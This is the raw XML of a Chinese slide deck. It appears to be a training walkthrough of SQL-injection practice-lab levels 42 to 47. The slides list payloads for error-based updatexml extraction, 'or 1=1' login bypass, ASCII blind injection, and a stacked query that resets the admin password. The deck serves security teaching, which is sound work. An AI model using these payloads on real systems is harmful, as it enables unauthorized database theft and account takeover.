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1457" r:id="rId2"/>
    <p:sldId id="1394" r:id="rId3"/>
    <p:sldId id="1486" r:id="rId4"/>
    <p:sldId id="1487" r:id="rId5"/>
    <p:sldId id="1493" r:id="rId6"/>
    <p:sldId id="1496" r:id="rId7"/>
    <p:sldId id="1497" r:id="rId8"/>
    <p:sldId id="1498" r:id="rId9"/>
    <p:sldId id="1499" r:id="rId10"/>
    <p:sldId id="1500" r:id="rId11"/>
    <p:sldId id="1501" r:id="rId1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37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6026" autoAdjust="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006"/>
        <p:guide pos="3775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" y="-2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靶场原理详解（十一）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第四十六关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5710" y="2060575"/>
            <a:ext cx="97764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判断库名： and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)--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判断表名：and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'limit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判断列名：and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' 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判断数据：and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)-- qwe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第四十七关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5710" y="2420620"/>
            <a:ext cx="97764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判断库名： </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)--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判断表名：</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'limit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判断列名：</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' 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判断数据：</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)-- qwe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94460" y="1550670"/>
            <a:ext cx="484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原理相同只是闭合的区别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第四十二关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79376" y="148478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658620"/>
            <a:ext cx="8747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这题看上去和之前二次注入的题目差不多，这里其实依旧是我们堆叠注入的系列题目，这题我们可以通过堆叠注入，在不知道密码的情况下利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>update</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>账户并进行登录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03612" y="2754476"/>
            <a:ext cx="6624285" cy="26510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第四十二关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44090" y="4977130"/>
            <a:ext cx="7728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找到注入点后尝试修改密码为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>123456</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：1';update security.users set password='123456' where username="admin"#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44090" y="1484630"/>
            <a:ext cx="7192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首先利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>or 1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>尝试注入，发现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>这里并不存在注入，然后尝试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，利用'or 1=1 -- qwe提示登录成功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20" y="2420620"/>
            <a:ext cx="5504180" cy="20078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第四十二关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08405" y="1772285"/>
            <a:ext cx="97764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判断库名： 'and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>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判断表名： 'and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'limit 0,1),0x7e),1)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判断列名： 'and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1)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-- qwe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判断数据： 'and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)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-- qwe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第四十三关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31504" y="1651000"/>
            <a:ext cx="8395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和之前题目一样，尝试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>or 1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句，发现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不存在注入，于是去尝试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，发现语句为：') or 1=1 -- qwe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69" y="2708919"/>
            <a:ext cx="7062305" cy="1898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5494" y="5058410"/>
            <a:ext cx="973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这里依旧是存在堆叠注入的，和上一题的利用方式一致，只是闭合的区别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第四十四关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09420" y="1724660"/>
            <a:ext cx="9067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进入这题发现和前面题目还是一样的，那么我们直接按照之前思路去做，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or 1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>尝试注入，发现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>这里并不存在注入，然后尝试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，利用'or 1=1 -- qwe提示登录成功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 descr="KW_G57SC`QQ$9KU39`_TY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25" y="2923540"/>
            <a:ext cx="6303010" cy="1631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0390" y="4810125"/>
            <a:ext cx="8926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这里跟上题一样，同样可以利用堆叠对他进行注入，区别只是这里并不能和上面一样利用报错注入的方式得到数据，这里可以利用我们之前所讲的盲注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第四十四关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52756" y="1723390"/>
            <a:ext cx="9126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' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> (length(database()))=8 -- </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>qwe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1242695" y="2294255"/>
            <a:ext cx="3570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利用ASCII码猜解当前数据库名称：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5710" y="2816225"/>
            <a:ext cx="9744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' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> (ascii(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>(database(),1,1)))=115-- </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>qwe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 返回正常，说明数据库名称第一位是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>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35710" y="3392805"/>
            <a:ext cx="9865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' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:t> (ascii(substr(database(),2,1)))=101-- qwe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> 返回正常，说明数据库名称第二位是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>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08100" y="3932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猜表名：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35710" y="4256405"/>
            <a:ext cx="10837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' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=101-- qwe 如果返回正常，说明数据库表名的第一个的第一位是e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28725" y="5570855"/>
            <a:ext cx="104451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'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> (ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1)))=105-- qwe 如果返回正常，说明</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>emails</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>表中的列名称第一位是</a:t>
            </a:r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1228725" y="51460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猜字段名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53820" y="1423035"/>
            <a:ext cx="927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猜解库名长度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第四十五关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26820" y="1651000"/>
            <a:ext cx="8395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和之前题目一样，尝试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>or 1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句，发现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不存在注入，于是去尝试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，发现语句为：') or 1=1 -- qwe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5" y="2456815"/>
            <a:ext cx="8000365" cy="2150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00810" y="5058410"/>
            <a:ext cx="973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这里依旧是存在堆叠注入的，和上一题的利用方式一致，只是闭合的区别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第四十六关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04340" y="1664335"/>
            <a:ext cx="8395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这题看上去跟前面题目是有一定区别的，我们可以发现后面sort的传参才是关键，尝试过后发现这里的传参起到的效果和我们</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>order by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>相同，那我们自然就想到我们的传参最后是拼接到了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>order by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>语句上，那么我们就没办法利用之前的联合查询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10" y="2816860"/>
            <a:ext cx="2643505" cy="35674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05,&quot;width&quot;:16005}"/>
</p:tagLst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1065</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>61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楷体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>sx272TGp_report_light</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>第四十二关</vt:lpstr>
      <vt:lpstr>第四十二关</vt:lpstr>
      <vt:lpstr>第四十二关</vt:lpstr>
      <vt:lpstr>第四十三关</vt:lpstr>
      <vt:lpstr>第四十四关</vt:lpstr>
      <vt:lpstr>第四十四关</vt:lpstr>
      <vt:lpstr>第四十五关</vt:lpstr>
      <vt:lpstr>第四十六关</vt:lpstr>
      <vt:lpstr>第四十六关</vt:lpstr>
      <vt:lpstr>第四十七关</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>中国信息安全测评中心:cisp运营中心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随风</cp:lastModifiedBy>
  <cp:revision>3119</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-02-11T06:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-09-01T08:45:49Z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